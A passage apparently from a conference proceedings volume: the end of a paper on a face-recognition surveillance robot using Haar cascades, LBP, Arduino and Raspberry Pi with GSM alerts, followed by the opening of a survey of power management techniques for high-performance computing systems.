detected face using Arduino and OpenCV, where the primary algorithms used are AdaBoost and Haar-like features. The paper by K. Maneesha, N. Shree, D. R. Pranav, S. K. Sindhu, and C. Gururaj [5] used Arduino and MATLAB with the Kanade–Lucas–Tomasi (KLT) algorithm for real-time face recognition but performed poorly in complicated crowds. Thus, the whole process is divided into two major stages: Viola–Jones is used to detect the face, and the KLT algorithm is later used to extract the features from the detected face. It can detect a human face in any video frame up to a distance of 350 cm in moderate light. The paper [6] aims at selecting the most informative features with the fewest possible features and the least data loss. This process is performed using a genetic programming algorithm and wrapper genetic programming (WGP).
Using this intelligent genetic programming mechanism helps in increasing the probability of finding a high-quality reduct. Paper [7] presents a social robot that performs face detection and tracking with the help of cascade classification and the local binary pattern histogram method along with OpenCV and Python 2.7. It contains servo motors with 12 degrees of freedom that help control the robot's head and face. It can later be improved by adding emotional expression. To facilitate face recognition [8], a system-on-chip (SoC) is integrated with an FPGA, where a local binary pattern histogram is used to extract the necessary features of the test image and match them against the features saved in the database. The SoC is equipped with an ARM processor responsible for receiving the input data stream and presenting the result as the output with reference to the distance. The robot in [9] uses the Haar cascade algorithm with a Raspberry Pi, and the camera module detects a human face. The GSM module added to it sends messages to the user containing the person's information as saved in the database, and a Bluetooth module controls the motion of the robot. IoT is the latest technology that is taking home automation to another level. Using IoT [10], a Raspberry Pi, along with the camera module, detects a human face, and a PIR sensor mounted on it detects the movement of nearby objects. Once motion is detected, it captures the place's image and sends
the image to the owner's smartphone. The paper [13] performs face detection using the Haar cascade algorithm but recognizes the detected face using eigenfaces and Gabor filters in videos; the main aim of the proposed method is to reduce the processing time. The eigenface method is efficient in terms of computational complexity, and the Gabor filter is best for pose changes. For detection and recognition of images [14, 15], the Viola–Jones algorithm and a back propagation neural network (BPNN) are used: the former detects the face, and the latter recognizes the detected face. There are a few problems in the process, such as typical skin tone, common features, and gender, that differentiate people. The research in [16–18] gives guidelines for establishing the interface design and the human–robot interaction (HRI) of a social robot, which helps avoid additional adjustments in the final design phase.

3 Implementation

A robot has a specific surveillance cycle, which is divided into two states: an active
state and an idle state [1–5]. During the idle state, the robot remains stationary
inside the organization, whether home or office, during the daytime, and moves around
the same compound at night. This is because, during that time [7–15], the PIR sensor is
active and searches for any movement around it. The sun radiates infrared continuously,
so if sunlight falls on the PIR sensor it generates an alarm signal even when no
movement has been detected; during the daytime, the robot is therefore kept indoors so
that the PIR sensor is not directly exposed to sunlight. During the active state, I2C
communication is established between the Raspberry Pi and the Arduino Uno, and the
camera module is used. In the structure made for the robot, the camera is inclined at an
angle of 45° with reference to the ground. At this angle, the camera detects a human
face, captures it, and moves on to the face recognition process. When the face matches a
face saved in the dataset, the robot sends a message to the owner with the name of the
recognized person. On the other hand, if the face does not match any face in the
dataset, an alert message is sent through the GSM module.
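To make this active-state flow concrete, the following minimal sketch (an assumption
about the implementation, not the authors' code) shows how a recognition result could
trigger an SMS through a SIM900A module using standard GSM text-mode AT commands over a
serial link; the port name, owner number, and helper names are purely illustrative.

```python
# Illustrative active-state alert logic: a known face produces an informational
# SMS, an unknown face produces an alert SMS, both via SIM900A AT commands.
import time
import serial  # pyserial

OWNER_NUMBER = "+911234567890"                       # placeholder owner number
gsm = serial.Serial("/dev/serial0", 9600, timeout=1)  # assumed SIM900A wiring

def send_sms(number, text):
    """Send one SMS using the standard GSM text-mode AT command sequence."""
    gsm.write(b"AT+CMGF=1\r")                        # switch modem to text mode
    time.sleep(0.5)
    gsm.write(f'AT+CMGS="{number}"\r'.encode())      # start a message to `number`
    time.sleep(0.5)
    gsm.write(text.encode() + b"\x1a")               # Ctrl+Z ends the message body
    time.sleep(3)

def handle_recognition(name):
    """Called once per captured frame after the recognition step (name may be None)."""
    if name is not None:
        send_sms(OWNER_NUMBER, f"Known person detected: {name}")
    else:
        send_sms(OWNER_NUMBER, "ALERT: unknown person detected by the robot")
```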
Various methods are used for detecting the face, such as the Viola–Jones method [6–13].
It relies on a few crucial concepts to detect a human face, listed below; a minimal
detection sketch follows the list.
1 Haar feature: This is a feature [14–19] used to analyze the captured image and
  determine whether a human face is present. Each Haar feature divides a region of the
  captured image into two parts, a dark side and a bright side; the average of all the
  dark pixels and the average of the light pixels are computed, and the two averages are
  subtracted to obtain the feature value.
2 AdaBoost algorithm: This is considered the simplest and fastest stage. Viola and
  Jones used this algorithm because it improves performance using elementary (weak)
  learners. The output of AdaBoost learning is a set of weak classifiers that can be
  grouped to form a strong classifier for further use. Each classifier responds to only
  a very small feature of the detected face, which is why cascades of such classifiers
  are commonly used to detect the pattern throughout the whole process.
3 Integral image: The integral image is a vital concept that accelerates the feature
  detection process by precomputing pixel sums from the original image. Each entry of
  the integral image holds the sum of the pixels above and to the left of it, and this
  accumulation proceeds from the top left to the bottom right of the image (Fig. 1).
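As a concrete illustration of the detection step, the sketch below uses OpenCV's
pretrained frontal-face Haar cascade; it is a minimal example assuming the
opencv-python package, with parameter values and window names chosen only for
illustration.

```python
# Haar-cascade face detection on webcam frames with OpenCV.
import cv2

cascade = cv2.CascadeClassifier(
    cv2.data.haarcascades + "haarcascade_frontalface_default.xml")

cap = cv2.VideoCapture(0)                 # webcam as the video source
while True:
    ok, frame = cap.read()
    if not ok:
        break
    gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
    # detectMultiScale slides the trained cascade of Haar features over the
    # integral image at several scales and returns bounding boxes (x, y, w, h).
    faces = cascade.detectMultiScale(gray, scaleFactor=1.1, minNeighbors=5)
    for (x, y, w, h) in faces:
        cv2.rectangle(frame, (x, y), (x + w, y + h), (0, 255, 0), 2)
    cv2.imshow("faces", frame)
    if cv2.waitKey(1) & 0xFF == ord("q"):
        break
cap.release()
cv2.destroyAllWindows()
```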

3.1 Local Binary Pattern (LBP) for Face Recognition

One of the many face recognition approaches is the local binary pattern (LBP) [3–15].
In this method, the gray value of the center pixel of a 3 × 3 neighborhood is compared
with the 8 surrounding pixels.

Fig. 1 Diagram of integral image pixel

To match the similarities between the captured image and an image in the dataset, the
LBP method can be used. The value of the center pixel is subtracted from each
surrounding pixel value in the 3 × 3 matrix; the result is 1 if the difference is
greater than or equal to 0 and 0 if it is less than 0. The 8 binary values obtained from
the surrounding pixels are then read in a fixed order, either clockwise or
anti-clockwise, and converted into decimal form to replace the pixel value of the center
(Figs. 2 and 3).
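The basic operator can be illustrated with a short sketch (a NumPy illustration of the
idea described above, not the robot's actual code):

```python
# Compute the LBP code of a single 3x3 gray-level neighbourhood.
import numpy as np

def lbp_value(neigh):
    """Return the LBP code of a 3x3 gray-level patch (center pixel at [1, 1])."""
    center = neigh[1, 1]
    # 8 surrounding pixels read clockwise starting at the top-left corner
    ring = [neigh[0, 0], neigh[0, 1], neigh[0, 2], neigh[1, 2],
            neigh[2, 2], neigh[2, 1], neigh[2, 0], neigh[1, 0]]
    bits = [1 if p >= center else 0 for p in ring]       # threshold step
    return sum(b << i for i, b in enumerate(bits))       # binary -> decimal

patch = np.array([[90, 80, 40],
                  [70, 60, 30],
                  [65, 50, 20]])
print(lbp_value(patch))   # LBP code that replaces the center pixel of this patch
```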
• Detection:
Due to technological advancement, various devices such as webcams can be used to obtain
the input video. The video is broken down into multiple frames, and each frame is
examined closely to detect any face in it. Detection is carried out on all frames, and
once a face is detected in a frame, a box is drawn around the detected face [17, 18].
The coordinates of the boxes drawn are saved for future reference. This step is
performed using MATLAB software, and the coordinates obtained are then fed into the
microcontroller.
• Tracking:

Fig. 2 Local binary pattern calculation

Fig. 3 Block diagram for the entire process



Fig. 4 Flowchart for face tracking

Once the coordinates are fed to the Arduino, the microcontroller tracks the detected
human's face. Arduino is one of the most popular open-source platforms, with both
software and hardware support. To control the motion of the robot, servo motors are
used, and two such servo motors are interfaced with the microcontroller for this
purpose [19]. Before performing any task, the servo motors are calibrated to the center.
The coordinates fed to the microcontroller are used to track the face in the specified
frame. As the person moves, the position of the webcam also changes, but there is a
constraint that the servo motor can rotate only within a limited angular range [20].
Viola–Jones operates only on front-facing faces, so instead of Viola–Jones, the KLT
algorithm can be considered to track the face even in a live video (Fig. 4).
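A minimal host-side sketch of this tracking step is shown below; it is an assumption
about how the face-box coordinates might be streamed to the microcontroller, with the
serial port, baud rate, and message format chosen only for illustration (the
Arduino-side servo sketch is not shown).

```python
# Convert a detected face box into pan/tilt error terms and stream them serially.
import serial  # pyserial

FRAME_W, FRAME_H = 640, 480
link = serial.Serial("/dev/ttyACM0", 115200, timeout=1)

def track(x, y, w, h):
    """Send the offset of the face centre from the frame centre to the servos."""
    cx, cy = x + w // 2, y + h // 2          # centre of the detected face box
    err_x = cx - FRAME_W // 2                # positive: face is right of centre
    err_y = cy - FRAME_H // 2                # positive: face is below centre
    # The microcontroller is expected to nudge the pan/tilt servos toward zero error.
    link.write(f"{err_x},{err_y}\n".encode())

# example: a face detected at (200, 150) with size 80 x 100
track(200, 150, 80, 100)
```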

4 Hardware Specification

Its small, credit-card-like size, together with the Wi-Fi and Bluetooth modules already
present on the board, makes the Raspberry Pi more profitable to use than a plain
microcontroller [1–12]. Therefore, the Arduino Uno and the Raspberry Pi are considered
the most crucial components used in most such robots. Apart from the Raspberry Pi
[1–5], there are a few other important components such as the chassis (body of the
robot), motors, and battery, and a motor driver (L293D) is also included for controlling
the movement of the robot [6–11].
Since one of the most critical applications of the robot is sending an SMS to the
owner's number, a GSM module with a SIM900A has been installed. To monitor everything
that the robot is recording, processing, and displaying, a remote display is also used,
connected to the robot through the Wi-Fi module. The PIR sensor is one of the most
important components because it initiates detection whenever it identifies movement
nearby. After the PIR sensor detects motion, it sends a signal to the Arduino board; a
signal is then sent to the Raspberry Pi to wake up, capture an image of the moving
object, and initiate the face detection and recognition process.

For tracking [1–13], an Arduino and servo motors were used to employ the Viola–Jones
technique, though it has a few restrictions, one being that it operates only on
front-facing faces. The setup was therefore later improved and modified by using the KLT
technique to track faces even in live videos. In the modified technique, an ATmega328P
microcontroller was used along with the Arduino and a webcam.

5 Software Specification

Software forms the backbone of this robot; without it, the robot cannot perform any
task. As already discussed, the robot's task is divided into three parts: face
detection, face recognition, and generating an alert signal. Face detection and face
recognition are programmed in Python, whereas the Arduino is programmed to generate the
alert signal.
In [1–4], the Haar cascade is used to perform face detection with the OpenCV tool. In
this technique, a dataset containing images with the feature of interest (positive
images) and images without it (negative images) is used to train the classifier to
operate accurately. The more the classifier is trained, the better its results. In this
process, the system tries to detect a human face in each frame of the video; once a face
is detected, a box is drawn around it, and the coordinates of the box are saved in the
microcontroller for further processing.
For an AI-based robot, a dataset needs to be created for training, since the more the
robot is trained, the more precise its output becomes. To create the dataset [1–7],
hundreds of facial images are captured and face detection is performed; the detected
faces are then saved in the dataset folder. For the robot's training [8–17], the local
binary pattern (LBP) approach is primarily used.
Equation (1) is used for calculating the LBP code of a pixel:

$$\mathrm{LBP}_{P,R}(X_C, Y_C) = \sum_{p=0}^{P-1} S\left(g_p - g_c\right) 2^{p} \qquad (1)$$

where $g_c$ is the gray value of the center pixel $(X_C, Y_C)$, $g_p$ $(p = 0, \ldots, P-1)$ are the gray values of the $P$ neighboring pixels on a circle of radius $R$, and $S(x) = 1$ if $x \geq 0$ and $0$ otherwise.

In summary, face detection and face recognition use the cascade algorithm implemented
with the OpenCV tool, and the alert signal is generated using the Arduino IDE. The final
training of the robot on the dataset is done using the LBP technique to increase its
efficiency.
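A minimal training sketch under these assumptions is shown below; it relies on the LBPH
recognizer shipped with the opencv-contrib-python package and on a hypothetical
dataset/<person>/<image>.jpg folder layout, neither of which is prescribed by the paper.

```python
# Train an LBP-histogram face recognizer on a folder of cropped face images.
import os
import cv2
import numpy as np

def load_dataset(root="dataset"):
    images, labels = [], []
    for label, person in enumerate(sorted(os.listdir(root))):
        for fname in os.listdir(os.path.join(root, person)):
            img = cv2.imread(os.path.join(root, person, fname), cv2.IMREAD_GRAYSCALE)
            if img is not None:
                images.append(img)
                labels.append(label)
    return images, np.array(labels)

images, labels = load_dataset()
recognizer = cv2.face.LBPHFaceRecognizer_create()   # LBP histograms per grid cell
recognizer.train(images, labels)
recognizer.write("trained_lbph.yml")                # saved model loaded at run time

# At run time the robot would call recognizer.predict(face_roi), which returns a
# label and a distance; a large distance would be treated as an unknown face.
```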

6 Results and Discussion

6.1 Face Recognition System

Building a face recognition robot starts with collecting human facial images, known as a
database (or dataset). In each captured image saved in the database, the face is
detected using the cascade classification technique with the OpenCV library and the
Python programming language. The faces of different people then need to be identified,
and for this purpose the local binary pattern (LBP) approach is used to extract the
facial features. The resulting database, also known as the training data, is used to
train the robot for face recognition through the complete process (Fig. 5).
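The dataset-creation step can be sketched as follows; this is again an illustrative
assumption, reusing the Haar cascade from above and saving cropped faces for later LBPH
training, with the folder layout and sample count chosen arbitrarily.

```python
# Capture webcam frames, detect faces, and save cropped grayscale samples.
import os
import cv2

person_id = "person_01"
out_dir = os.path.join("dataset", person_id)
os.makedirs(out_dir, exist_ok=True)

cascade = cv2.CascadeClassifier(
    cv2.data.haarcascades + "haarcascade_frontalface_default.xml")
cap = cv2.VideoCapture(0)

saved = 0
while saved < 100:                        # collect e.g. 100 samples per person
    ok, frame = cap.read()
    if not ok:
        break
    gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
    for (x, y, w, h) in cascade.detectMultiScale(gray, 1.1, 5):
        face = cv2.resize(gray[y:y + h, x:x + w], (200, 200))
        cv2.imwrite(os.path.join(out_dir, f"{saved:03d}.jpg"), face)
        saved += 1
cap.release()
```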

6.2 The Face Tracking System

After creating the database of captured images, a face can be detected in any image in
the database, and there is a coordinate corresponding to every detected face. Every
captured image has a particular resolution; for example, the live video captured by a
webcam has a resolution such as 1280*720 (or 640*360 or 640*480). The coordinates of the
center of the detected face can then be found using the following formulas:
$$X_c = X + \frac{W}{2}$$

$$Y_c = Y + \frac{H}{2}$$

where
X = initial horizontal coordinate of the face box,
W = width of the face box,
X_c = horizontal coordinate of the center of the face,
Y = initial vertical coordinate of the face box,
H = height of the face box,
Y_c = vertical coordinate of the center of the face.
For example, a face box detected at X = 200, Y = 150 with W = 80 and H = 100 has its center at (240, 200).

Fig. 5 Flowchart for complete face recognition performed by the robot



7 Limitations of Existing Work

Although the face recognition robot is considered a great technological advancement,
its applications have saturated: despite using various high-end technologies, it does
little more than capture an image, recognize a face, and store the image in the
database. It should have real-time applications that adapt to the surrounding
conditions, and existing face recognition robots are lacking in this respect.
In this work, face recognition is the heart of the project, but an attempt is also made
to make the robot more beneficial for day-to-day safety. In the present scenario, the
whole world is fighting the coronavirus, and wherever a person goes, whether it is an
office, college, school, or mall, someone with an infrared thermometer is usually
stationed at the entrance to measure body temperature. The further scope of this work is
therefore to build an AI-based robot that recognizes a person and measures body
temperature at the same time.

8 Conclusion

The paper is presented with the aim of reviewing the papers written and technologies
developed in the field of face recognition. The present study concludes that using
hybrid computing methods such as ANN, SVM, and SOM results in an enhanced face
recognition algorithm. We have also described the various problems faced during face
recognition in an unconstrained environment, the issues encountered, and the reasons why
further study and research are needed, along with the techniques used in various papers
on these topics. We have also described the methods required to develop the most
effective and efficient face recognition system. This review has also tried to highlight
vital areas where research can be done and should help researchers in this field who are
trying to come up with new and efficient technology.

References

1. Mittal, S., Rai, J. K. (2016). Wadorp: An autonomous mobile robot for surveillance. In
IEEE International Conference on Power Electronics. Intelligent Control and energy systems
(ICPEICES).
2. Maneesha, K., Shree, N., Pranav, D. R., Sindhu, S. K., & Gururaj, C. (2017). Real time face
detection robot. In 2017 2nd IEEE International Conference on Recent Trends in Electronics,
Information & Communication Technology (RTEICT). https://doi.org/10.1109/rteict.2017.825
6558.
3. Viola, P., & Jones, M. (2001). Rapid object detection using boosted cascade of simple features.
IEEE Computer Society Conference on Computer Vision and Pattern Recognition, I, 511–518.

4. Viraktamath, S. V., Katti, M., Khatawkar, A., & Kulkarni, P. (2013). Face detection and tracking
using open CV. The SIJ Trans on Computer Network & Communication Engineering (CNCE),
1(3), 45–50.
5. Alweshah, O. A., Alzubi, J. A., & Alzubi, S. A. M. (2016). Solving attribute reduction problem
using wrapper genetic programming. International Journal of Computer Science and Network
Security, 16(5), 77.
6. Sanjaya, W. S. M., Anggraeni, D., Zakaria, K., Juwardi, A., Munawwaroh, M. (2017). The
design of face recognition and tracking for human-robot interaction. In 2017 2nd Inter-
national conferences on Information Technology, Information Systems and Electrical Engi-
neering (ICITISEE), Yogyakarta, 2017 (pp. 315-320) https://doi.org/10.1109/ICITISEE.2017.
8285519.
7. Stekas, N., & Heuvel, D. V. (2016). Face recognition using Local Binary Patterns Histograms
(LBPH) on an FPGA-based system on chip (SoC). In IEEE International Parallel and
Distributed Processing Symposium Workshop, November 2016.
8. Mehra, S., & Charaya, S. (2016) Enhancement of face recognition technology in biometrics.
International Journal of Scientific Research and Education 4(8)
9. Aydin, L., & Othman, N. A. (2017). A new IoT combined face detection of people by
using computer vision for security application. In International Artificial Intelligence and Data
Processing Symposium (IDAP).
10. Rahim, M. A., Hossain, M. N., Wahid, T., & Azam, M. S. (2013). Face recognition using
Local Binary Patterns (LBP). Global Journal of Computer Science and Technology Graphics
& Vision, 13(4), 3.
11. Tian, Y.-L., Kanade, T., & Cohn, J. F. (2001). Recognising action units for facial expression
analysis. IEEE Transactions on Pattern Analysis and Machine Intelligence, 23(2), 95–115.
12. Tathe, S. V., Narote, A. S., Narote, S. P. (2016). Face detection and recognition in videos. In
2016 IEEE Annual India Conference(INDICON).
13. Tikoo, S., & Malik, N. (2016). Detection of face using viola jones and recognition using
back propagation neural network. International Journal of Computer Science and Mobile
Computing, 5(5), 288–295.
14. Zhao, W., Chellappa, R., Rosenfeld, A., Phillips, P. J. (2003). Face recognition: A literature
survey (pp. 399–458). ACM Computing Surveys.
15. Jain, R., Gupta, D., Khanna, A. Usability feature optimization using MWOA. In S. Bhat-
tacharyya, A. Hassanien, D. Gupta, A. Khanna & I. Pan (Eds.), International Conference on
Innovative Computing and Communications (ICICC2018). Lecture Notes in Networks and
Systems, (Vol 56). Springer.
16. Hegel, F., Eyssel, F., & Wrede, B. (2010). The social robot flobi: Key concepts of industrial
design. IEEE International Symposium on Robot and Human Interactive Communication, 19,
107–112.
17. Kalas, M. S. (2014). Real time face detection and tracking using OpenCV. International Journal
of Soft Computing and Artificial Intelligence, 2(1), 41–44.
18. Thakare, N., Shrivastava, M., & Kumari, N. (2016). Face detection and recognition for auto-
matic attendance system. International Journal of Computer Science and Mobile Computing,
5(4), 74–78.
19. Manjunatha, R., & Nagaraja, R. (2017). Home security system and door access control based
on face recognition. International Research Journal of Engineering and Technology, 4(3),
437–442.
20. Sanjaya, W. S. M., Anggraeni, D., Zakaria, K., Juwardi, A., & Munawwaroh, M. (2017). The
design of face recognition and tracking for human-robot interaction. In 2017 2nd International
Conferences on Information Technology, Information Systems and Electrical Engineering
(ICITISEE). https://doi.org/10.1109/icitisee.2017.8285519.
State-of-the-Art Power Management
Techniques

Maaz Ahmed and Waseem Ahmed

Abstract Energy efficiency is one of the biggest challenges presently faced by high
performance computing (HPC) systems. The need to build energy-efficient computer
systems and applications in the field of scientific computing is growing every day.
Numerous studies have been carried out in the fields of embedded systems and mobile
computing to minimize the power consumed by devices, and the components and algorithms
developed for achieving energy efficiency in such systems can also be applied in the
field of HPC. In this paper, we survey power management techniques for HPC systems. We
compare different power management techniques on several important parameters to
identify their merits and demerits. This paper is intended to help in developing a
deeper understanding of different power management techniques and in designing the more
energy-efficient HPC systems of tomorrow.

Keywords HPC · Green computing · Energy efficiency · Power management · Power-aware

1 Introduction

Power usage by computing systems has exceeded tolerable limits and has become a cause
for major concern, since the majority of day-to-day affairs across the world are linked
either directly or indirectly to virtual transactions through computer networks.
According to reports, large-scale data centers in the USA consume around 70 billion kWh,
which represents about 2% of the country's energy consumption [1]. The inability to meet
such huge consumption leads to the temporary delay or shutdown of several data center
projects.

M. Ahmed (B)
HKBK College of Engineering, Bangalore, India
W. Ahmed
Faculty of Computing and Information Technology, King Abdulaziz University, Jeddah, Saudi
Arabia


High-density power consumption results in overheating of the components, thereby
incurring additional energy expenditure on cooling mechanisms.
Another damaging effect of high power consumption is increased environmental pollution.
A report by the US Environmental Protection Agency (EPA) states that for every 1000 kWh
of energy consumed, 0.72 tons of CO2 are released into the atmosphere [2]. Furthermore,
an increase in power consumption directly leads to a rise in temperature inside the
system, followed by its failure.
According to Feng [3], for every 10 °C rise in temperature, the failure rate of a
computing node doubles. Thus, power consumption is a big concern for researchers and
leading vendors. Since the energy consumed by mobiles and other embedded systems
determines their battery life, the concept of power-aware computing was introduced in
the 1990s for systems that run on batteries. However, power management is now essential
for modern equipment and is in demand for high performance computing (HPC) systems, and
the inefficiency of existing HPC systems in controlling energy consumption adds to this
demand.
According to Ge et al. [4], five supercomputers averaged 54–71% of peak performance on
the optimized benchmark package. However, the situation was found to be worse for
scientific applications, where the performance was only about 10% of the peak [5]. The
study also found that this could be due to the unequal distribution of load across the
nodes of the clusters during activities such as computing, communication, and
input/output (I/O). Components that execute faster consume energy while waiting for
slower components; hence, during such idle or slack times, the nodes could be slowed or
even shut down to save energy. This paper reviews the studies related to existing power
profiling techniques, power management techniques, and power simulators and attempts to
identify the merits and demerits of such techniques.
The remainder of this paper is organized as follows. Sections 2–6 provide an overview
and classification of power management techniques, and Sect. 7 provides concluding
remarks and discusses future challenges.

2 Static Power Management

The replacement of high power components with low power components to save
power is referred to as static power management.
Rivoire et al. [6] suggested JouleSort to evaluate energy efficiency. The study revealed
that JouleSort was approximately three times more energy efficient than existing
techniques. However, JouleSort did not consider all the possible energy-related concerns
of multimedia applications, since it focused on data management tasks.
Caulfield et al. [7] described a new system architecture known as Gordon for reducing
power consumption and increasing the performance of data-intensive applications. They
combined flash memory with power-efficient processors
to reduce power consumption, and they studied the impact of flash storage and the Gordon
architecture on the power efficiency and performance of data-centric applications. The
findings revealed that Gordon systems outperformed disk-based clusters by 1.5 times and
delivered up to 2.5 times better performance per watt.
Andersen et al. [8] made an attempt to modify the conventional architecture of
data-intensive clusters to minimize the power consumption without any compromise
in their capacity, latency, availability, and throughput. They presented an architecture
known as fast array of wimpy nodes (FAWN), where the energy-efficient CPUs are
combined with flash storage to provide faster and more efficient random access to
data. The analysis revealed that FAWN clusters have the capability of handling 350
key-value queries per Joule of energy which is two times more than the disk-based
system.
Hamilton [9] identified that the cost of delivering high-scale services mainly depends
on the hardware and power required for the services. The study investigated power
dissipation in high-scale data centers and found that low-power servers effectively
yielded the same aggregate throughput at lower cost compared to high-power servers.
Vasudevan et al. [10] experimentally evaluated FAWN, which consists of a large number of
slower but efficient nodes coupled with low-power storage. The study used a set of
microbenchmarks to check the maximum performance of the wimpy nodes, and the findings
revealed that the overall performance of the low-frequency nodes was better than that of
conventional high-performance CPUs.
However, there are some limitations in this architecture, which were pointed out by
Valentini et al. [11]. According to them, the major concern is the feasibility of the
FAWN architecture for problems that cannot be parallelized or whose working set cannot
be further divided to fit into the available memory of the smaller nodes.

3 Dynamic Power Management

According to Liu and Zhu [2], dynamic speed scaling (DSS) and dynamic resource sleeping
(DRS) are the two variants of dynamic power management (DPM). In DSS, the power
consumption of the processor is controlled by modulating its speed, so performance is
traded off according to necessity. Dynamic voltage scaling (DVS) operates by changing
the voltage, either increasing or decreasing it according to circumstances: if more
performance is required, the voltage is increased (overvolting), and if power must be
saved, the voltage is decreased (undervolting). Similarly, dynamic frequency scaling
(DFS) operates by scaling frequencies, and dynamic voltage and frequency scaling (DVFS)
operates by curtailing the frequency and/or the supply voltage of the processor.
Thermal throttling depends upon the temperature of the processor. Multifrequency
memories and

tispeed disks. Increased energy consumption due to transition in the states of per-
formance is one of the limitations of these mechanisms. Moreover, it is responsible
for the increased resource latency overhead. DRS inactivates (power-off) the com-
ponents of the computer to conserve energy and activates them when required. The
power on and off states are described as C0 and Cn, respectively. This mechanism
is restricted by the amount of time and energy spent on the transition from inactive
state to active state.
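For illustration, DVFS can be exercised on a Linux node through the cpufreq sysfs
interface, as in the minimal sketch below; this is not taken from any of the cited
studies, it must run as root, and the listed files are only available with drivers (such
as acpi-cpufreq) that expose the userspace governor.

```python
# Manually scale the frequency of cpu0 via the Linux cpufreq sysfs interface.
CPU = "/sys/devices/system/cpu/cpu0/cpufreq/"

def read(name):
    with open(CPU + name) as f:
        return f.read().strip()

def write(name, value):
    with open(CPU + name, "w") as f:
        f.write(value)

freqs = [int(f) for f in read("scaling_available_frequencies").split()]
print("available frequencies (kHz):", freqs)

write("scaling_governor", "userspace")        # take manual control of the P-state
write("scaling_setspeed", str(min(freqs)))    # downclock during slack or I/O phases
# ... run the memory- or communication-bound phase of the application here ...
write("scaling_setspeed", str(max(freqs)))    # restore full speed for compute phases
```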
Ge et al. [12] recommended performance-based distributed DVS techniques for power-aware
HPC clusters. The study performed a comparative analysis of the available DVS techniques
on a power-aware cluster while executing parallel scientific applications and showed
that DVS scheduling techniques achieve significant energy savings, up to 36% of total
energy with no loss in performance. However, the energy savings vary with the
application, the system workload, and the DVS strategy. Another drawback identified in
this study was that these techniques were implemented largely by manual means and should
be replaced by modern automated ones.
Hotta et al. [13] introduced a power-performance optimization technique based
on the power profiles generated in high-performance PC cluster by using DVFS
scheduling. The execution of the program was split into several sections, and the
best section for power efficiency was selected. Selecting the best was not an easy and
direct task as the overhead of DVFS transition is not free from errors. An optimiza-
tion algorithm was proposed to select a gear while also considering the transition
overhead. Power-profiling system known as PowerWatch was designed to examine
the efficiency of the optimization algorithm. The findings revealed that the study
achieved almost 40% reduction in terms of energy delay product (EDP) without any
major impact on its performance.
Rajamani et al. [14] designed a novel approach aimed at power management
for which the critical workload indicators, power and performance usage of the
applications were continuously monitored. They proposed two solutions, namely
performance maximizer which identifies the best performance under specific power
constraints and powersaver which minimizes the power consumption while main-
taining optimum performance levels.
The study by Freeh et al. [15] presented a system known as jitter, which reduces
the processor’s frequency in a cluster to minimize its power consumption. Jitter
reduces the energy spent by the nodes at synchronization points during various slack
times, thereby achieving significant reduction in the energy consumed. The findings
showed that jitter saved 8% of the energy consumed with 2% time penalty on an
unbalanced program.
According to Khargharia et al. [16], power management techniques can be classified into
the following types: hardware-based power management, turning off idle devices, and
quality-of-service (QoS) and energy trade-offs. Hardware-based power management involves
varying the voltage and frequency of the processor according to the performance
requirements. Turning off idle devices is another DPM technique in which devices are
turned on/off wholly to reduce power consumption; it can be used in both battery-operated
devices and servers. The QoS and energy
trade-offs technique involves saving more power at the cost of performance efficiency
within acceptable limits. They presented a theoretical framework (Automatic Memory
Management) for automatically optimizing power and performance in data centers at
runtime with the help of a multichip memory system.
Laszewski et al. [17] used DVFS to minimize power consumption in virtual
machines. The study proposed and implemented a scheduling algorithm that allo-
cates virtual machines in a DVFS-enabled cluster by dynamically scaling the supply
voltages. Simulation techniques were used by the study to analyze the algorithm.
Performance analysis of the study revealed that design and implementation of such
scheduling algorithms achieved significant reduction in the power consumption.
Huang and Feng [18] used a specific workload characterization that infers the
CPU stall cycles due to off-chip activities. The study presented a power-aware, eco-
friendly, run-time algorithm based on this workload characterization. In order to
scale the voltage and frequency supplied to the processor in a parallel computing
environment and to obtain the workload characterization, the algorithm dynamically
monitored the processor state. The algorithm was found to achieve better performance
control than the β-adaptation algorithm and the Linux ondemand governor, achieving 11%
savings in the overall energy consumed.
Le Sueur and Heiser [19] analyzed the efficiency of DVFS on three cutting-edge
generations of AMD Opteron processors by running memory-bound benchmarks. The study
showed that the effectiveness of DVFS is low on newer platforms and that actual savings
were observed only when execution times were shorter (at higher frequencies) and were
"padded" with the energy consumed when idle.
Alvarruiz et al. [20] proposed a work called CLUES which replaces idle state with
power off state. The system was integrated with the help of different HPC cluster
middleware such as batch-queuing systems and cloud management systems. Pow-
ering on and off of the computing nodes was performed with the help of different
mechanisms such as Power Device Units, Wake-on-LAN, Intelligent Platform Man-
agement Interface, or other infrastructure-specific mechanisms. The performance of
the model was evaluated against two real use cases involving two different HPC
clusters. The findings revealed energy and cost savings of about 38% and 16%,
respectively. However, one limitation of the study was that it considered only the
nodes with homogenous energy consumption.
An optimization strategy that uses both voltage scaling and chip parallelism was
proposed by Ozturk et al. [21] for voltage island-based embedded designs. The approach
makes use of a compiler that exploits heterogeneity in parallel execution, applying
different voltages and frequencies to different processors to reduce energy consumption
without increasing the overall execution cycles. Experiments were carried out with
different applications, and the results revealed that the optimization technique is
capable of yielding energy benefits at a large scale.

4 Power Management in Embedded Systems

Embedded systems have size and cost constraints: the battery is very small and the
surface area of the device is small, which limits heat dissipation, so embedded systems
require proper cooling. In some embedded applications, such as video and audio playback
and gaming, the ratio of the processor's runtime to idle time is very high, and in such
devices dynamic power management techniques can help reduce power consumption at
runtime.
Pedram [22] reviewed the tools and techniques adopted for power management
in embedded systems. They considered the hardware platform, the application soft-
ware, and the system software for their analysis. The concepts and techniques were
illustrated with the help of design examples from an Intel Strong ARM-based sys-
tem. The study was not intended to be a comprehensive review, yet it served as a
base for a comprehensive understanding of power-aware design methodologies and
techniques for embedded systems.
Brock and Rajamani [23] designed a generic power management system to man-
age energy and power efficiently in embedded systems. According to the design,
power management strategy can be varied based on the application. DPM strategy
refers to the policies for power optimization designed by the system designer. How-
ever, activation of these policies/strategies is controlled by the policy manager.
Agarwal et al. [24] used on-demand paging scheme for increasing the energy effi-
ciency of wireless network embedded systems. The study implemented on-demand
paging scheme on an infrastructure-based WLAN which consisted of iPAQ PDAs
equipped with Bluetooth radios and Cisco Aironet wireless networking cards. The
findings of the study exhibited power savings that range from 23% to 48% over
802.11b standard operating modes with trivial impact on performance. One major
drawback of the design is that it was prototyped in the low-power BT radios, and
the performance of the scheme on high-power large sensor-based networks remains
uncertain.
Raghunathan and Chou [25] studied the various issues and trade-offs involved in
designing and implementing energy-saving techniques in embedded systems. System
design techniques which involve extracting energy from the environment and making
it available for consumption by the system were explained by their study. The study
